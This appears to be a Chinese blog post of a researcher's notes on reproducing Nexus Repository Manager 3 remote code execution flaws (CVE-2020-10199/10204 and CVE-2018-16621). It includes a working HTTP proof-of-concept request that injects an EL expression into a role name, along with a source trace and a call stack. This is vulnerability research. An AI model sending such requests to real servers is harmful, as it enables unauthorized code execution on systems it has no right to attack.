[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE

参考

  • https://support.sonatype.com/hc/en-us/articles/360044882533
  • https://cloud.tencent.com/announce/detail/1023
  • https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA
  • https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
  • https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf

漏洞描述

XSS就算了。
RCE:

an attacker with any type of account on NXRM to execute arbitrary code by crafting a malicious request to NXRM

影响范围:3.21.1

http://download.sonatype.com/nexus/3/nexus-3.21.1-01-unix.tar.gz

修复版本:3.21.2

http://download.sonatype.com/nexus/3/nexus-3.21.2-03-unix.tar.gz

CVE-2020-10204

管理员权限的RCE:

The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.

参考:
https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

应该是CVE-2018-16621的绕过吧。
在Mac上复现成功。
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
在Windows上,报了这个错:

javax.el.ELException: java.lang.IllegalArgumentException: object is not an instance of declaring class

历史版本下载:

https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3

CVE-2018-16621 Nexus EL表达式注入

参考:https://github.com/Cryin/Paper/blob/master/CVE-2018-16621%20Nexus%20Repository%20Manager3%20%E4%BB%BB%E6%84%8FEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5.md

PoC:

POST /service/extdirect HTTP/1.1
Host: 192.168.85.129:8081
Content-Type: application/json
Connection: close
Cookie: fusionauth.locale=zh_CN; remember-me=YWRtaW46MTU4NjQyMDcwNTI5ODo5ZmJhMGViMDFjYjM2MmEzNGU5YWQ2MTExYTYwZWNjNQ; JSESSIONID=FD1D448F8785A262DC6453B773955371; username="FS1YvSKKiX8_"; password="FS1YvSKKiX8_"; rememberme="false"; validation="8ab366e87f98368ce07c2c89f9064073"; XSRF-TOKEN=46b5a232-f694-4e27-930d-9e0163f5e310; NXSESSIONID=e5682534-b930-4491-ab86-aa02e5f32a12
Content-Length: 218

{"action":"coreui_User","method":"create","data":[{"userId":"test123","firstName":"77","lastName":"cai","password":"password","email":"77@qq.com","status":"active","roles":["nx-admin${7776+1}"]}],"type":"rpc","tid":49}

当请求的role名不存在时,会加入到missing中,
nexus-3.13.0-01\system\org\sonatype\nexus\nexus-security\3.13.0-01\nexus-security-3.13.0-01.jar!\org\sonatype\nexus\security\role\RolesExistValidator#isValid

            try {
                this.authorizationManager.getRole(String.valueOf(item));
            } catch (NoSuchRoleException var6) {
                missing.add(item);
            }

[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
最后跟到这里:
nexus-3.13.0-01\system\org\hibernate\hibernate-validator\5.1.2.Final\hibernate-validator-5.1.2.Final.jar!\org\hibernate\validator\internal\engine\messageinterpolation\InterpolationTerm#interpolateExpressionLanguageTerm

[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
部分调用栈贴一下:

interpolateExpressionLanguageTerm:112, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:90, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolateExpression:342, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:298, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:182, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:362, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolation:271, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolations:232, ValidationContext (org.hibernate.validator.internal.engine)
validateSingleConstraint:291, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:133, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:91, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraint:83, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:547, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForNonDefaultGroup:511, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:448, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:403, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraint:723, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraints:601, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParametersInContext:992, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:300, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:254, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:65, ValidationInterceptor (org.sonatype.nexus.validation.internal)
invoke:51, ValidationInterceptor (org.sonatype.nexus.validation.internal)

执行完之后:
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
证明确实在这里执行了EL表达式。

碰到这样的错误,

参考:
https://*.com/questions/53021763/cannot-open-local-storage-nexus3-db-config-with-mode-rw-db-name-config

将nexus换到另一个目录下,可能跟之前启动的nexus的orintdb冲突了。

上一篇:jeefast启动报错class jdk.internal.loader.ClassLoaders$AppClassLoader


下一篇:java List 排序 Collections.sort()